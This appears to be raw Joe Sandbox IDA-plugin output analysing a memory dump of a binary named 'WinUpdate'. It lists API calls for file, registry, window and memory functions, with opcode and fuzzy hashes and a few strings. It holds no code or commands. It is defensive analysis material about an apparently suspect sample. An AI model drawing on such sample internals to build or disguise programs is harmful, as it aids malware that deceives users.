                                                                                                                                                                                                                                                                                                • API String ID: 3334572018-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                                                                                                • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                                                                                                                                • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                                                                                                                • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseFind
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1863332320-0
                                                                                                                                                                                                                                                                                                • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                                                                                                                • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Open
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 71445658-0
                                                                                                                                                                                                                                                                                                • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                                                                                                • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                                                                                                • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                                                                                                                                                                                • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3655998216-0
                                                                                                                                                                                                                                                                                                • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                                                                                                                • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00445426
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1828521557-0
                                                                                                                                                                                                                                                                                                • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                                                                                                                • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2136311172-0
                                                                                                                                                                                                                                                                                                • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                                                                                                • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ??2@??3@
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1936579350-0
                                                                                                                                                                                                                                                                                                • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                                                                                                                                                                • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                                                                                                                                • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                                                                                                                                • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                                                                                                                                                                                                • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                                                                                                                                • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                                                                                                                                • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                                                                                                                                                • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                                                                                                                • API String ID: 2080319088-3046471546
                                                                                                                                                                                                                                                                                                • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                                                                                                                                • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                                                                                                                                • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                                                                                                                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                                                                                                                                • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                                                                                                                                • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1331804452-0
                                                                                                                                                                                                                                                                                                • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                                                                                                                                • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                                                                                                                                • <%s>, xrefs: 004100A6
                                                                                                                                                                                                                                                                                                • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: memset$_snwprintf
                                                                                                                                                                                                                                                                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                                                                                                                • API String ID: 3473751417-2880344631
                                                                                                                                                                                                                                                                                                • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                                                                                                                                • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00412057
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                                                                                                                                                • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3550944819-0
                                                                                                                                                                                                                                                                                                • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                                                                                                                                • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                                                                                                                                • free.MSVCRT ref: 0040B0FB
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                                                                                • free.MSVCRT ref: 0040B12C
                                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
